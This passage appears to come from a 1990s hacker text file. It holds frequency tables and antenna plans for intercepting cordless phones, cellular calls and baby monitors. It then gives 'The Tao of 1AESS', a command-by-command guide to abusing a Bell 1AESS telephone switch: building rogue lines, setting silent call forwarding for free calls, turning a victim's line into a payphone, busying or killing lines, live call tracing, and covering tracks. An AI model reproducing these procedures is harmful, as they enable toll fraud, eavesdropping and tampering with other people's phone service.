  1436. system.  Modulated data is sent over the airwaves with a ham
  1437. transceiver, where it is received and de-modulated with a Terminal
  1438. Node Controller (TNC).  Expect the use of wireless data
  1439. transmissions to increase over the next few years, and not just
  1440. among ham operators.
  1441. While not having anything to do with telephones, the "baby
  1442. monitors" people use are transmitters just like cordless phones. 
  1443. They are also low-power devices, so range is limited.  Most people
  1444. who use these devices would be shocked to learn that they are
  1445. "bugging" their own home.
  1446.  
  1447. PRESENT AND FUTURE CHALLENGES
  1448. -----------------------------
  1449. Spread spectrum, digital transmissions, encryption...these are all
  1450. factors that are affecting monitoring today.  While most cellular
  1451. systems are presently analog systems, there are operational digital
  1452. systems in some areas.  Scanners that are currently available won't
  1453. be able to decipher the digital communications, and it is unlikely
  1454. that digital-capable scanners will be produced.  That means it will
  1455. be up to the hackers to provide the technology to intercept these
  1456. communications.  Spread spectrum is quite hackable, as it was never
  1457. intended as an encryption system, per se, yet the phone
  1458. manufacturers are certainly marketing it as such.  And one oft
  1459. overlooked advantage of the Clipper chip is the fact that the
  1460. backdoor can be exploited by hackers as well as the government. 
  1461. In the meanwhile, there are plenty of intercepts to be had, and
  1462. there will continue to be.  
  1463.  
  1464.  
  1465. =================================================================
  1466.  
  1467. For More Information:
  1468. =================================================================
  1469.  
  1470. Scanner Modification Handbook (Vols. I & II), by Bill Cheek
  1471. The scanner modification handbooks offer a plethora of information
  1472. on hacking scanners.  Hacks include: increased channel capacity
  1473. (example: RS PRO-2006 from 400 channels to 6,400!), adding signal-
  1474. strength meters, cellular-freq. restoration, scanning-speed
  1475. increases, and much more.
  1476.  
  1477. World Scanner Report, by Bill Cheek
  1478. A monthly newsletter on the latest scanner hacks.
  1479.  
  1480. Available from:
  1481. COMMtronics Engineering
  1482. Box 262478
  1483. San Diego, CA 82196-2478
  1484. BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!)
  1485.  
  1486. COMMtronics Engineering also offers a scanner-computer interface
  1487. for RS PRO-43/2004/2005/2006 model scanners.
  1488. ===================================================================
  1489. CRB Research Books
  1490. Box 56
  1491. Commack, MY 11725 
  1492.  
  1493. CRB has books on scanner modifications, frequency guides, and other
  1494. interesting subjects.
  1495. =================================================================
  1496. POPULAR COMMUNICATIONS
  1497.  
  1498. CQ Publications
  1499. 76 N. Broadway
  1500. Hicksville, NY 11801
  1501. (516) 681-2926
  1502.  
  1503. Pop Comm is a monthly magazine on all sorts of radio monitoring,
  1504. including scanning, shortwave, and broadcast.
  1505. ==================================================================
  1506. MONITORING TIMES
  1507.  
  1508. Grove Enterprises, Inc.
  1509. P.O. Box 98, 
  1510. 300 S. Highway 64 West 
  1511. Brasstown, North Carolina 28902-0098
  1512.  
  1513. M.T. is a monthly magazine covering all varieties of radio
  1514. communications.
  1515.  
  1516. ==================================================================
  1517. NUTS & VOLTS
  1518. Nuts & Volts is a monthly magazine that covers a wide variety of
  1519. electronic-related subjects.
  1520.  
  1521. T&L Publications, Inc.
  1522. 430 Princeland Court
  1523. Corona, CA 91719
  1524. (909) 371-8497
  1525. (909) 371-3052 fax
  1526. CI$ 74262,3664
  1527. 1-800-783-4624 SUBSCRIPTION ORDERS ONLY
  1528. ===================================================================
  1529. USENET:
  1530. alt.radio.scanner
  1531. rec.radio.scanner
  1532. ===================================================================
  1533.  
  1534. Charts & Tables:
  1535.  
  1536. 1. Cordless Telephone Frequencies (VHF)
  1537. 2. Cordless Telephone Frequencies (900MHz)
  1538. 3. Cellular Telephone Frequencies
  1539. 4. Business Band Frequencies (VHF, UHF, 800MHz)
  1540. 5. IMTS Frequencies
  1541. 6. PAGER Frequencies
  1542. 7. PACKET Frequencies
  1543. 8. ROOM MONITOR Frequencies
  1544. 9. homebrew cordless dipole antenna
  1545. 10. homebrew 1/4 wave groundplane antenna
  1546.  
  1547.  
  1548. =================================================================
  1549. TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL)
  1550.  
  1551. CH   BASE      HANDSET
  1552. --   ----      -------
  1553.  1   46.100    49.670
  1554.  2   46.630    49.845
  1555.  3   46.670    49.860
  1556.  4   46.710    49.770
  1557.  5   46.730    49.875
  1558.  6   46.770    49.830
  1559.  7   46.830    49.890
  1560.  8   46.870    49.930
  1561.  9   46.930    49.990
  1562. 10   46.970    46.970
  1563. =================================================================
  1564. TABLE 2 - 900MHz CORDLESS FREQS.
  1565.  
  1566. Cordless phones have been allocated the frequencies 
  1567. between 902-228MHz, with channel spacing between 
  1568. 30-100KHz.
  1569. Following are some examples of the frequencies used by phones
  1570. currently on the market.
  1571.  
  1572. ---------------------------------------------------------------- 
  1573. Panasonic KX-T9000 (60 Channels)  
  1574. base     902.100 - 903.870 Base frequencies (30Khz spacing) 
  1575. handset  926.100 - 927.870 Handset frequencies 
  1576. CH   BASE    HANDSET    CH   BASE    HANDSET    CH   BASE   HANDSET
  1577. --  -------  -------    --  -------  -------    --  ------- -------
  1578. 01  902.100  926.100    11  902.400  926.400    21  902.700 926.700
  1579. 02  902.130  926.130    12  902.430  926.430    22  902.730 926.730
  1580. 03  902.160  926.160    13  902.460  926.460    23  902.760 926.760
  1581. 04  902.190  926.190    14  902.490  926.490    24  902.790 926.790
  1582. 05  902.220  926.220    15  902.520  926.520    25  902.820 926.820
  1583. 06  902.250  926.250    16  902.550  926.550    26  902.850 926.850
  1584. 07  902.280  926.280    17  902.580  926.580    27  902.880 926.880
  1585. 08  902.310  926.310    18  902.610  926.610    28  902.910 926.910
  1586. 09  902.340  926.340    19  902.640  926.640    29  902.940 926.940
  1587. 10  902.370  926.370    20  902.670  926.670    30  902.970 926.970
  1588.  
  1589. 31  903.000  927.000    41  903.300  927.300    51  903.600 927.600
  1590. 32  903.030  927.030    42  903.330  927.330    52  903.630 927.630
  1591. 33  903.060  927.060    43  903.360  927.360    53  903.660 927.660
  1592. 34  903.090  927.090    44  903.390  927.390    54  903.690 927.690
  1593. 35  903.120  927.120    45  903.420  927.420    55  903.720 927.720
  1594. 36  903.150  927.150    46  903.450  927.450    56  903.750 927.750
  1595. 37  903.180  927.180    47  903.480  927.480    57  903.780 927.780
  1596. 38  903.210  927.210    48  903.510  927.510    58  903.810 927.810
  1597. 39  903.240  927.240    49  903.540  927.540    59  903.840 927.840
  1598. 40  903.270  927.270    50  903.570  927.570    60  903.870 927.870
  1599.  
  1600. ------------------------------------------------------------ 
  1601.  
  1602. V-TECH TROPEZ DX900 (20 CHANNELS) 
  1603. 905.6 - 907.5   TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
  1604. 925.5 - 927.4   HANDSET FREQUENCIES 
  1605.  
  1606. CH   BASE    HANDSET    CH   BASE    HANDSET    CH   BASE   HANDSET
  1607. --  -------  -------    --  -------  -------    --  ------- -------
  1608. 01  905.600  925.500    08  906.300  926.200    15  907.000 926.900
  1609. 02  905.700  925.600    09  906.400  926.300    16  907.100 927.000
  1610. 03  905.800  925.700    10  906.500  926.400    17  907.200 927.100
  1611. 04  905.900  925.800    11  906.600  926.500    18  907.300 927.200
  1612. 05  906.000  925.900    12  906.700  926.600    19  907.400 927.300
  1613. 06  906.100  926.000    13  906.800  926.700    20  907.500 927.400
  1614. 07  906.200  926.100    14  906.900  926.800 
  1615.  
  1616. ------------------------------------------------------------ 
  1617. OTHER 900 MHZ CORDLESS PHONES 
  1618. AT&T #9120  - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ 
  1619. OTRON CORP. #CP-1000  902.1 - 903.9 & 926.1 - 927.9 MHZ 
  1620. SAMSUNG #SP-R912- - - 903.0         &         927.0 MHZ 
  1621.  
  1622. ------------------------------------------------------------
  1623. ==================================================================
  1624. TABLE 3 - CELLULAR TELEPHONE FREQUENCIES
  1625. wireline ("b" side carrier)
  1626. 824.1000-834.9000
  1627. 869.0100-879.9900
  1628.  
  1629. non-wireline ("a" side carrier)
  1630. 835.0200-849.0000
  1631. 880.0200-894.0000
  1632.  
  1633.  
  1634. ==================================================================
  1635. TABLE 4 - BUSINESS BAND RADIO FREQS.
  1636.  
  1637. 151.5050-151.9550MHz
  1638. 154.4900-154.5400
  1639. 460.6500-462.1750
  1640. 462.7500-465.0000
  1641. 471.8125-471.3375
  1642. 474.8125-475.3375
  1643. 896.0125-900.9875
  1644. 935.0125-939.9875
  1645. 806.0125-810.9875
  1646. 811.0125-815.9875
  1647. 816.0125-820.9875
  1648. 851.0125-855.9875
  1649. 856.0125-860.9875
  1650. 861.0125-865.9875
  1651. =================================================================
  1652. TABLE 5 - MOBILE TELEPHONE FREQS. (see note1 below)
  1653. SIMPLEX             OUTPUT    INPUT       OUTPUT    INPUT
  1654. --------            --------  --------    --------  --------
  1655. 035.2600            152.0300  158.4900    454.3750  459.3750
  1656. 035.3000            152.0600  158.5200    454.4000  459.4000
  1657. 035.3400            152.0900  158.5500    454.4250  459.4250
  1658. 035.3800            152.1200  158.5800    454.4500  459.4500
  1659. 035.5000            152.1500  158.6100    454.4750  459.4750
  1660. 035.5400            152.1800  158.6400    454.5000  459.5000
  1661. 035.6200            152.2100  158.6700    454.5250  459.5250
  1662. 035.6600*           454.0250  459.0250    454.5500  459.5500
  1663. 043.2200*           454.0500  459.0500    454.5750  459.5750
  1664. 043.2600            454.0750  459.0750    454.6000  459.6000
  1665. 043.3400            454.1000  459.1000    454.6250  459.6250
  1666. 043.3800            454.1250  459.1250    454.6500  459.6500
  1667. 043.4200            454.1500  459.1500    
  1668. 043.3000            454.1750  459.1750    
  1669. 043.5000            454.2000  459.2000    
  1670. 043.5400            454.2250  459.2250    
  1671. 043.5800*           454.2500  459.2500    
  1672. 043.6400*           454.2750  459.2750    
  1673. 152.2400*           454.3000  459.3000    
  1674. 152.8400*           454.3250  459.3250    
  1675. 158.1000*           454.3500  459.3500    
  1676. 158.7000*           
  1677.  
  1678. *-also allocated for pager usage
  1679.  
  1680. (note1: These freqs are, for the most part, dead.  The FCC has
  1681. reallocated most of these for other services.)
  1682.  
  1683. =================================================================
  1684. TABLE 6 - PAGER FREQUENCIES
  1685. 035.2200     035.5800     152.4800     154.6250     158.4600
  1686. 157.7400     465.0000     462.8000     462.7750     462.9250
  1687. 462.7500     462.8750     462.8250     462.9000     462.8500
  1688. 928.0000     929.0000     930.0000     931.0000
  1689. =================================================================
  1690. TABLE 7 - PACKET FREQUENCIES
  1691. 050.6200
  1692. 223.5200-223.6400
  1693. 223.7100-223.8500
  1694. 2303.500-2303.800
  1695. 2303.900
  1696. 2399.000-2399.500
  1697. =================================================================
  1698. TABLE 8 - BABY MONITOR FREQUENCIES
  1699. 49.300
  1700. 49.830
  1701. 49.845
  1702. 49.890
  1703. =================================================================
  1704. TABLE 9 - AIR PHONE FREQUENCIES
  1705. OUTPUT   INPUT
  1706. 454.6750 459.6750
  1707. 454.9750 459.9750
  1708. 849.0000 851.0000 
  1709. 894.0000 896.0000 
  1710. ==================================================================
  1711.  
  1712. CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING
  1713.  
  1714. The best way to improve the range for monitoring cordless
  1715. telephones is to use an antenna specifically cut for the
  1716. frequencies used in cordless phones.  The following is a very
  1717. effective, yet easy to build, "homebrew" antenna.
  1718.  
  1719. CORDLESS DIPOLE
  1720. ---------------
  1721. materials needed:
  1722. wire - virtually any type will suffice
  1723. matching transformer (RS part number 15-1296)
  1724. f connector (RS part number 278-225)
  1725. ??? connector (this will connect the antenna to the scanner, so it
  1726.      will be dependant upon what type of antenna jack the scanner
  1727.      utilizes.  Most use a BNC-type connector.  Some older models
  1728.      will use a Motorola-type connector.)
  1729. coax cable - while many types of coax can be used, a low-loss cable
  1730.      would be best, especially if a long cable run is required.
  1731.      RG-6 satellite coax (RS part number 278-1316) is a good choice.
  1732.  
  1733.  
  1734.         wire              transformer            wire
  1735.      -------------------------< >-------------------------
  1736.                                +  f connector
  1737.                                |
  1738.                                |  coax
  1739.                                |
  1740.                                |
  1741.                                *  connector
  1742.                               [ ] scanner
  1743.  
  1744. =================================================================
  1745.  
  1746. CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA
  1747.  
  1748. Here is a simple-to-build antenna that will improve reception for
  1749. a particular frequency area.  
  1750.  
  1751. materials needed:
  1752. wire - a rigid wire is needed here.  Clothes hangers work well.
  1753. panel mount SO-239 connector (RS part number 278-201)
  1754. male PL-259 connector (RS part number 278-205)
  1755. coax cable 
  1756. connector (to scanner)
  1757.  
  1758.  
  1759.                            |
  1760.                            |
  1761.                            |
  1762.                            |
  1763.                           [ ]
  1764.                         /     \
  1765.                       /         \
  1766.                     /             \
  1767.  
  1768.  
  1769. The length of the five rods will be dependant upon the frequency
  1770. you intend to monitor.  Use the following formula:
  1771.  
  1772. WL=3X10^8/F
  1773.  
  1774. WL = wavelegnth (in meters)
  1775. F  = frequency (in MHz)
  1776.  
  1777.  
  1778. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
  1779.  
  1780.  
  1781.  
  1782.                                     -=-
  1783.  
  1784.                            -= The Tao of 1AESS =-
  1785.                               -=-=-=-=-=-=-=-=
  1786.                            -= DeadKat&Disorder =-
  1787.  
  1788.                                     -=-
  1789.  
  1790.                 -= Special thanks to Gatsby and Mark Tabas =-
  1791.  
  1792.  
  1793. Introduction
  1794. -=-=-=-=-=-=
  1795. The Bell System's first trial of electronic switching took place in Morris,
  1796. Illinois, in 1960.  The Morris trial culminated a 6-year development and
  1797. proved the viability of the stored-program control concept.  The first
  1798. application of electronic local switching in the Bell System occurred in May
  1799. 1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
  1800.  
  1801. The 1ESS switching system was designed for use in areas where large numbers
  1802. of lines and lines with heavy traffic (primarily business customers) are
  1803. served.  The system has generally been used in areas serving between 10,000
  1804. and 65,000 lines and has been the primary replacement system for urban
  1805. step-by-step and panel systems.  The ease and flexibility of adding new
  1806. services made 1ESS switching equipment a natural replacement vehicle in 
  1807. city applications where the demand for new, sophisticated business and
  1808. residence services is high.
  1809.  
  1810. In 1976, the first electronic toll switching system to operate a digital
  1811. time-division switching network under stored-program control, the 4ESS
  1812. system, was placed in service.  It used a new control, the 1A processor,
  1813. for the first time to gain a call carrying capacity in excess of 550,000
  1814. busy-hour calls.  The 1A processor was also designed for local switching
  1815. application.  It doubled the call-carrying capacity of the 1ESS switching
  1816. system and was introduced in 1976 in the first 1AESS switch.  The network
  1817. capacity of 1ESS switching equipment was also doubled to allow the 1AESS
  1818. switch to serve 130,000 lines.
  1819.  
  1820. In addition to local telephone service, the 1AESS switches offer a variety
  1821. of special services.  Custom Local Area Switching Services (CLASS) are 
  1822. available as well Custom Calling Services.  Business customers may select
  1823. offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
  1824. Service, or electronic tandem switching.
  1825.  
  1826. Although more modern switches like 5ESS and DMS 200 have been developed, it
  1827. is estimated that some 50 percent of all switches are still 1AESS.
  1828.  
  1829. Commands
  1830. -=-=-=-=
  1831. The 1AESS uses a command line interface for all commands.  The commands are
  1832. divided into three fields:  action, identification, and data.  The fields 
  1833. are always separted by a colon.  Every command is terminated by either a
  1834. period for verification commands or a 'ballbat' (!) for change commands.  
  1835. The control-d is used to execute the command instead of a return.  The 
  1836. underscore is used as a backspace.  Commands are always typed in 'all caps'.
  1837.  
  1838. The action field is the first field of the command and is ended by a colon.
  1839. The identification field is ended by the second colon.  The identification
  1840. field has one or two subfields which are separated by a semicolon.  Semicolons
  1841. are not used elsewhere in the command.  The data field consists of keyword
  1842. units and is the remaining portion of the command.
  1843.  
  1844. Basic Machine Commands
  1845. -=-=-=-=-=-=-=-=-=-=-=
  1846. These commands provide useful information from the system.  The WHO-RV-
  1847. command will tell you what CO it is and what version of the OS is installed.
  1848. If your output is scrolling off the screen press space to end scrolling.  
  1849. The V-STOP- command will clear the buffer.
  1850.  
  1851. WHO-RV-.                  System information.
  1852. SPACE                     Stops output from scrolling.
  1853. V-STOP-.                  Free buffer of remaining LENS/INFO.
  1854.  
  1855. Channel Commands
  1856. -=-=-=-=-=-=-=-=
  1857. Channel commands are used to redirect input and output.  If a switch won't
  1858. respond to a command use the OP:CHAN command to check on current channel.
  1859. If your channel is not responding, use the MON:CHAN command to switch output
  1860. and control to your terminal (the remote).  You can check the status of the 
  1861. RC with the RCCENSUS command.
  1862.  
  1863. OP:CHAN:MON!                   Shows all channels which are being monitored.
  1864. MON:CHAN SC1;CHAN LOC!         Redirect output to remote screen.
  1865. STOP: MON;CHAN SC1;CHAN LOC!   Redirect output to local screen.
  1866.                                (This command needs to be done after you 
  1867.                                are finished to help cover your tracks)
  1868. OP:RCCENSUS!                   To see recent change status.
  1869.  
  1870.  
  1871. Tracing Commands
  1872. -=-=-=-=-=-=-=-=
  1873. CI-LIST- will give you a list of all numbers which are being traced 
  1874. externally.  It will not show you lines which are being traced 
  1875. internally, ie: numbers inside one of the prefixes controlled 
  1876. by the switch you are on. 
  1877.  
  1878. CI-LIST-.                 Traced line list.
  1879.  
  1880.  
  1881. Check Features on Line
  1882. -=-=-=-=-=-=-=-=-=-=-=
  1883. The VF command is used to check the current settings on a line.  
  1884. The DN XXXXXXX specifies the phone number of the line you wish to check.
  1885. Replace XXXXXXX with the seven digit phone number of the line you are 
  1886. checking.
  1887.  
  1888. VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC!       Check features of a line.    
  1889. VF:DNSVY:DN XXXXXXX,1,LASFTRS!          Display last Features
  1890.  
  1891.           Call Features   CWT- Call Waiting
  1892.                           CFB- Call Forward Busy - Busy=VM
  1893.                           CFV- Call Forwarding Variable
  1894.                           CFD- Call Forward Don't answer
  1895.                           TWC- Three Way Calling
  1896.                           TTC- Touch Tone
  1897.                           RCY- Ring Cycle
  1898.                           SC1- Speed Calling 1
  1899.                           SC2- Speed Calling 2
  1900.                           UNA- No Long Distance 
  1901.                           PXX- Block all LD service (guess)
  1902.                           MWI- Message Waiting Indicator
  1903.                           CHD- centrex(unremarkable)
  1904.                           CPU- centrex(unremarkable)
  1905.                           CLI- Calling Line Identification (CID)
  1906.                           ACB- Automatic Call Back Feature (?)
  1907.                           BLN- Special Toll Billing
  1908.                           FRE- Free Calling
  1909.  
  1910. The standard output of a command appears below.  The 'DN 348 2141' specifies
  1911. the number you are checking.  The calling features will be listed on the 
  1912. second line by their three letter acronyms.  This line has call waiting
  1913. (CWT), a trace (TRC), and touch tone dialing (TTC).
  1914.  
  1915. Example of 1A output:
  1916.  
  1917. M 53 TR75 2 DN 348 2141 00000003
  1918.               CWT  TRC  TTC                                     
  1919.  
  1920.  
  1921. Searching For Free Lines
  1922. -=-=-=-=-=-=-=-=-=-=-=-=
  1923. The VFY command can be used to check if a line is in use.  The output will
  1924. list the LEN (Line Equipment Number) for the line and its call features in 
  1925. octal.  If the LEN is all zeros, then that number has not been assigned.
  1926. Replace XXXXXXX with the number you wish to check.  You must prefix the
  1927. phone number with 30.  You can also check for unused LEN's using the VFY 
  1928. command.  Use the space bar to stop scrolling and the V-STOP command to  
  1929. cancel when looking up free LEN's.
  1930.  
  1931. VFY-DN-30XXXXXXX.               Search for free lines.
  1932. VFY-LEN-4100000000.             List all free LENs.
  1933. VFY-TNN-XXXXXXXX.               To get information on trunk.
  1934.  
  1935. The output for the VFY-DN command will appear like the one below.  Notice                               
  1936. that this number has been assigned a LEN so it is in use.
  1937.  
  1938. M 06 TR01 796 9146           
  1939.          0 0 0 0                                     
  1940.          LEN 01 025 000         
  1941.          001 000 000 000 000 000 4
  1942.          000 000 000 000 000 000 000 000
  1943.          0 0 0 0               
  1944.          0 0 0 0 0                                  
  1945.                                 
  1946.  
  1947. Searching for a Particular Feature on a Line (like trace)
  1948. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1949. All line information is stored in the switch for its coverage area.  The 
  1950. switch is like a huge database in this sense.  You can do global searches
  1951. on the switch for any feature.  One especially interesting feature to search
  1952. for are traced numbers.  Traced numbers listed this way are INTERNALLY 
  1953. traced as opposed to globally traced numbers shown with the CI-LIST- command.
  1954. Global and internal trace lists are always very different.  And remember,
  1955. be a good samaritan and call the person being traced and let them know!  ;-)
  1956.  
  1957. VF:DNSVY:FEATRS,EXMATCH TRACE!          Pull all numbers IN switch area with
  1958.                                         trace on it (takes a sec).
  1959.  
  1960. You can exmatch for any LASS feature by replacing the keyword TRACE with any 
  1961. call feature like call forwarding (CFB) and speed calling (SC1).
  1962.  
  1963.  
  1964. To See What Numbers Are on a Speed Calling List
  1965. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1966. Another nice use for the VFY command is to see what is on a line's speed
  1967. calling list.  Replace XXXXXXX with the target phone number.  One devious
  1968. use is to look at the CO's speed call list to find other internal telco
  1969. numbers.
  1970.  
  1971. VFY-LIST-09XXXXXXX020000
  1972.          09=mask  02=single list  (one digit speed calling)
  1973.                   20=double list  (two digit speed calling)
  1974.                   28=     "                   "
  1975.                   36=     "                   "
  1976.                   44=     "                   "
  1977.  
  1978.  
  1979. To Build a Line
  1980. -=-=-=-=-=-=-=-
  1981. The recent change command (RC) is used to create and modify lines.  Because
  1982. RC commands are usually very long and complex, they are typed on multiple
  1983. lines to simplify them.  Each subfield of the data section of the command is
  1984. typed on a separate line ended by a slash (\) followed by pressing ctrl-d.
  1985. To create a line, you specify LINE in the identification field.  Before 
  1986. a line can be created, you must first locate an unused number by using the
  1987. VFY-DN command explained above.  Once a free number has been found, you
  1988. use the VFY-LEN to find an available LEN.  To build a new line, follow
  1989. these steps:
  1990.  
  1991. First, find spare LEN (VFY-LEN-4100000000.).  Next find free line. Now type
  1992. in the RC commands using the following commands as a template:
  1993.  
  1994. RC:LINE:\         (create a line)
  1995. ORD 1\            (execute the command immediately)
  1996. TN XXXXXXX\       (telephone number)
  1997. LEN XXXXXXXX\     (len found from above)
  1998. LCC 1FR\          (line class code 1fr)
  1999. CFV\              (call forward)
  2000. XXX 288\          (type XXX, space, then the three digit PIC)
  2001.                    ld carrier -  222 - MCI
  2002.                                  288 - AT&T
  2003.                                  333 - Sprint, etc.)
  2004. !                 (BEWM, don't forget the ctrl-d!!)
  2005.  
  2006. (Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE 
  2007.  has taken affect)
  2008.  
  2009.  
  2010. Creating Call Forwarding Numbers
  2011. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2012. The call forwarding feature is the most important feature for hackers.  By
  2013. creating a line or modifying an existing line with call forwarding, you can
  2014. than use it to make free phone calls.  You set the line to call forward/
  2015. no ring and then give it the call forwarded number.  This will allow you
  2016. to call the modified line and be instantly forwarded to your pre-chosen
  2017. destination.
  2018.  
  2019. First create a line using RC:LINE:, then modify the line using the following
  2020. commands as a template.
  2021.  
  2022. RC:CFV:\          (add call forwarding to a line.. begin: )
  2023. ORD 1\            (execute the command immediately) 
  2024. BASE XXXXXXX\     (base number you are changing)
  2025. TO XXXXXXX\       (local - XXXXXXX : ld - XXXXXXXXXX )
  2026. PFX\              (set prefix to 1 if ld)
  2027. !                 (BEWM)
  2028.  
  2029.  
  2030. To Change Call Forward Number
  2031. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2032. It is safer to modify an existing call forward than to create a new line 
  2033. solely for this purpose.  You can use the VFY command and EXMATCH for CFB to
  2034. find lines with call forwarding.  Before you can change the call forwarding
  2035. 'TO' number you must delete the old one.  Remove call forward number using 
  2036. CFV:OUT with the template below.
  2037.  
  2038. RC:CFV;OUT:\      (remove call forward number...begin: )
  2039. ORD 1\            (execute command immediately)             
  2040. BASE XXXXXXX\     (number to remove it from)             
  2041. !                 (Yeeee-Hahhhahah)
  2042.  
  2043.  
  2044. Make Call Forward Not Ring
  2045. -=-=-=-=-=-=-=-=-=-=-=-=-=
  2046. The only drawback to call forwarding off someone's line is if rings they
  2047. might answer.  To get around this, you add the call-forward no-ring option
  2048. (ICFRR) using the following as a template.
  2049.  
  2050. RC:LINE;CHG:\     (recent change line to be specified)
  2051. ORD 1\            (execute command immediately)
  2052. TN XXXXXXX\       (number you wanna fuck with)
  2053. ICFRR\            (this takes the ring off)
  2054. !                 (Go!)
  2055.  
  2056.  
  2057. Adding a feature to a line 
  2058. -=-=-=-=-=-=-=-=-=-=-=-=-=
  2059. The RC:LINE;CHG: can also be used to add any other call feature.  Use the
  2060. same template but change the feature.
  2061.  
  2062. RC:LINE;CHG:\     (this is used for changing features)
  2063. ORD 1\            (order number)
  2064. TN XXXXXXX        (telephone number you are fucking with)
  2065. TWC\              (replace this with any feature you wish)
  2066. !                 (Fire!)
  2067.  
  2068.  
  2069. Removing a Feature
  2070. -=-=-=-=-=-=-=-=-=
  2071. Use the NO delimiter to remove a feature from a line.
  2072.  
  2073. RC:LINE;CHG:\     (change a feature)
  2074. ORD 1\            (effective immediately)
  2075. TN XXXXXXX\       (telephone number)
  2076. CFV NO\           (feature followed by NO)
  2077. !                 (Boo-Ya!)
  2078.  
  2079.  
  2080. Change Phone number into payphone
  2081. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2082. You've read about in the Hacker Crackdown, now you too can be 31337 and 
  2083. change Gail Thackery's phone into a payphone.  In fact you can change the
  2084. line class code (LCC) to anything you want.  To display the LCC of a line
  2085. use the following and replace the XXXXXXX with the line you wish to view.
  2086.  
  2087. VF:DNSVY:LCC,DN XXXXXXX,1,PIC!    (display line class code)
  2088.                                    DTF = Payphone
  2089.                                    1FR = Flat Rate
  2090.                                    1MR = Measured Rate
  2091.                                    1PC = One Pay Phone
  2092.                                    CDF = DTF Coin
  2093.                                    PBX = Private Branch Exchange
  2094.                                    CFD = Coinless(ANI7) Charge-a-call
  2095.                                    INW = InWATS  (800!@#)
  2096.                                    OWT = OutWATS 
  2097.                                    PBM = O HO/MO MSG REG (NO ANI)
  2098.                                    PMB = LTG = 1 HO/MO (Regular ANI6)
  2099.                                    (ani6 and ani7 - only good for DMS)
  2100.  
  2101. To change the line into a payphone use the RC:LINE;CHG command and modify
  2102. the LCC like the example below.
  2103.  
  2104. RC:LINE;CHG;\     (this is used for changing features)
  2105. ORD 1\            (order number)
  2106. TN XXXXXXX\       (telephone number you are fucking with)
  2107. LCC DTF\          (line class code you are changing to)
  2108. !                 (Make it so.)
  2109.  
  2110. *(You may have to remove some LASS features when doing this)*
  2111.  
  2112.  
  2113. To Kill a Line and Remove It Permanently
  2114. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2115. If you need to delete a line you have created (or haven't) use the following
  2116. syntax.
  2117.  
  2118. RC:LINE;OUT:\     (remove line)
  2119. ORD 1\            (effective immediately)
  2120. TN XXXXXXX\       (on this number)
  2121. !                 (GO!)
  2122.  
  2123.  
  2124. Monitoring Phone Calls
  2125. -=-=-=-=-=-=-=-=-=-=-=
  2126. There are powerful utilities to monitor calls and affect phone lines 
  2127. available on a 1A.  The T-DN- commands allow you to check the current
  2128. status of line and make it busy or idle.  If a line happens to be active
  2129. you can use the NET-LINE- command to trace the call and find the numbers
  2130. for both calling parties.
  2131.  
  2132. T-DN-RD XXXXXXX.                See if call in progress.
  2133.                                         output:  =1 line busy
  2134.                                                 =0 line idle
  2135. T-DN-MB XXXXXXX.                Make line busy.
  2136. T-DN-MI XXXXXXX.                Make line idle.
  2137. NET-LINE-XXXXXXX0000.           To do a live trace on a phonenumber thru 
  2138.                                 switch.
  2139. NET-TNN-XXXXXX                  Same as above for trunk trace
  2140.  
  2141. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2142.  
  2143. Appendix 1 - Common output messages seen on 1A switches
  2144. -=-=-=-=-=
  2145.  
  2146.       ** ALARM **
  2147.  
  2148. AR01  Office alarm
  2149. AR02  Alarm retired or transferred
  2150. AR03  Fuse blown
  2151. AR04  Unknown alarm scan point activated
  2152. AR05  Commercial power failure
  2153. AR06  Switchroom alarm via alarm grid
  2154. AR07  Power plant alarm
  2155. AR08  Alarm circuit battery loss
  2156. AR09  AMA bus fuse blown
  2157. AR10  Alarm configuration has been changed (retired,inhibited)
  2158. AR11  Power converter trouble
  2159. AR13  Carrier group alarm
  2160. AR15  Hourly report on building and power alarms
  2161.  
  2162.       ** AUTOMATIC TRUNK TEST **
  2163. AT01  Results of trunk test
  2164.  
  2165.       ** CARRIER GROUP **
  2166. CG01  Carrier group in alarm
  2167. CG03  Reason for above
  2168.  
  2169.       ** COIN PHONE **
  2170. CN02  List of pay phones with coin disposal problems
  2171. CN03  Possible Trouble
  2172. CN04  Phone taken out of restored service because of possible coin fraud
  2173.  
  2174.       ** COPY **
  2175. COPY  Data copied from one address to another
  2176.  
  2177.       ** CALL TRACE **
  2178. CT01  Manually requested trace line to line, information follows
  2179. CT02  Manually requested trace line to trunk, information follows
  2180. CT03  Intraoffice call placed to a number with CLID
  2181. CT04  Interoffice call placed to a number with CLID
  2182. CT05  Call placed to number on the CI list
  2183. CT06  Contents of the CI list
  2184. CT07  ACD related trace
  2185. CT08  ACD related trace
  2186. CT09  ACD related trace
  2187.  
  2188.       ** DIGITAL CARRIER TRUNK **
  2189. DCT COUNTS Count of T carrier errors
  2190.  
  2191.       ** MEMORY DIAGNOSTICS **
  2192. DGN   Memory failure in cs/ps diagnostic program
  2193.  
  2194.       ** DIGITAL CARRIER "FRAME" ERRORS **
  2195. FM01  DCT alarm activated or retired
  2196. FM02  Possible failure of entire bank not just frame
  2197. FM03  Error rate of specified digroup
  2198. FM04  Digroup out of frame more than indicated
  2199. FM05  Operation or release of the loop terminal relay
  2200. FM06  Result of digroup circuit diagnostics
